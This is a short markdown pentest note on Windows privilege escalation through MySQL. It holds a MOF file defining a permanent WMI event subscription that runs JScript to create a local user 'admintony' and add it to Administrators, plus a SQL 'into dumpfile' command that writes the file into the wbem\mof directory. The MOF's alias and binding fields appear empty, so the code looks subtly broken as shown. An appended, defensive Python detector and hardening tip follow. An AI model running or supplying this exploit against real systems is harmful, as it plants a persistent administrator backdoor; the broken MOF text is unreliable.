    002-MOF手工提权辅助.md
    872 B / 2021-07-17 00:01:42
    # MOF privilege escalation:
    
    ```mof
    #pragma namespace("\\.\root\subscription") 
    
    instance of __EventFilter as  
    { 
        EventNamespace = "Root\Cimv2"; 
        Name  = "filtP2"; 
        Query = "Select * From __InstanceModificationEvent " 
                "Where TargetInstance Isa \"Win32_LocalTime\" " 
                "And TargetInstance.Second = 5"; 
        QueryLanguage = "WQL"; 
    }; 
    
    instance of ActiveScriptEventConsumer as  
    { 
        Name = "consPCSV2"; 
        ScriptingEngine = "JScript"; 
        ScriptText = 
        "var WSH = new ActiveXObject(\"WScript.Shell\") WSH.run(\"net.exe user admintony admin /add&&net.exe localgroup administrators admintony /add\")"; 
    }; 
    
    instance of __FilterToConsumerBinding 
    { 
        Consumer   = ; 
        Filter = ; 
    }; 
    
    ```
    
    Save as 1.mof
    
    Then execute in MySQL:
    
    ```sql
    select load_file('D:/wwwroot/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
    
    ```
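
For detection, the following added example (not part of the original note) flags the two artifacts this technique leaves behind: a MOF file that binds a script consumer to an event filter, and a SQL statement that writes into the `wbem/mof` directory. The rule names, function names and sample inputs are constructed for illustration, and `CommandLineEventConsumer` is included as the other WMI consumer class that executes commands.

```python
import re

# Indicators taken from the MOF shown on this page: a permanent WMI event
# subscription whose consumer runs script text or a command line.
MOF_RULES = {
    "subscription_namespace": re.compile(r"#pragma\s+namespace\s*\(.*root\\+subscription", re.I),
    "script_consumer": re.compile(r"instance\s+of\s+(ActiveScriptEventConsumer|CommandLineEventConsumer)", re.I),
    "filter_binding": re.compile(r"instance\s+of\s+__FilterToConsumerBinding", re.I),
    "shell_or_account_cmd": re.compile(r"WScript\.Shell|net(\.exe)?\s+(user|localgroup)", re.I),
}
# SQL file-write clauses, and the auto-compiled MOF directory as a target.
SQL_WRITE = re.compile(r"into\s+(dumpfile|outfile)\s+'([^']*)'", re.I)
MOF_DIR = re.compile(r"[\\/]wbem[\\/]+mof[\\/]", re.I)

def scan_mof(text):
    """Return the sorted names of the rules that match a MOF file's text."""
    return sorted(name for name, rx in MOF_RULES.items() if rx.search(text))

def is_suspicious_mof(text):
    """True when an executing consumer is bound to a filter, as on this page."""
    return {"script_consumer", "filter_binding"} <= set(scan_mof(text))

def scan_queries(lines):
    """Return (line_number, target_path) for SQL file writes into wbem/mof."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = SQL_WRITE.search(line)
        if m and MOF_DIR.search(m.group(2)):
            hits.append((n, m.group(2)))
    return hits

# Constructed samples: a non-functional MOF fragment and three query-log lines.
SAMPLE_MOF = r'''
#pragma namespace("\\.\root\subscription")
instance of ActiveScriptEventConsumer as $C { ScriptText = "new ActiveXObject(\"WScript.Shell\")"; };
instance of __FilterToConsumerBinding { Consumer = $C; };
'''
SAMPLE_LOG = [
    "12 Query select * from orders where id = 7",
    "12 Query select load_file('D:/wwwroot/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'",
    "13 Query select name into outfile 'D:/export/names.csv' from users",
]

if __name__ == "__main__":
    print(scan_mof(SAMPLE_MOF), is_suspicious_mof(SAMPLE_MOF))
    print(scan_queries(SAMPLE_LOG))
```

Run `scan_mof` over files found in the `wbem\mof` directory and `scan_queries` over the MySQL general query log. Setting MySQL's `secure_file_priv` to a dedicated directory or to `NULL` removes the file-write step this technique depends on.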
    
    
    